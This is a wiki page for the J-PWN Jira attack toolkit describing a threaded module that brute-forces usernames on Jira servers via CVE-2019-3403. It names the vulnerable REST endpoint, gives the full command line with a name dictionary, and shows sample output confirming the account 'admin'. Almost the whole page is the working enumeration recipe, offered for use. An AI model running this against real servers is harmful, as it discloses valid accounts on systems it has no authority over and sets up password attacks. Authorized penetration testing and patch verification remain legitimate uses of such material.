CVE‐2019‐3403 Brute Force - carnal0wnage/J-PWN GitHub Wiki
CVE-2019-3403 Brute Force
This threaded module guesses usernames against the url below via CVE-2019-3403
module name: cve_2019_3403_brute
url: /rest/api/2/user/picker?query={username}
python3 j-pwn.py --single http://JIRASERVER --module cve_2019_3403_brute --dict ../usernames/first.last100.txt
[INFO] Running module cve_2019_3403_brute with dictionary ../usernames/first.last100.txt
INFO: Total usernames to check: 101
+ Valid username found: admin | URL: JIRASERVER/rest/api/2/user/picker?query=admin
+ Vulnerabilities Found:
+ [Username Enumeration] Valid username found: admin
Notes:
- The module prints some status so you can see what's happening
- You can set verbose = True in the module code if you want to see each request being made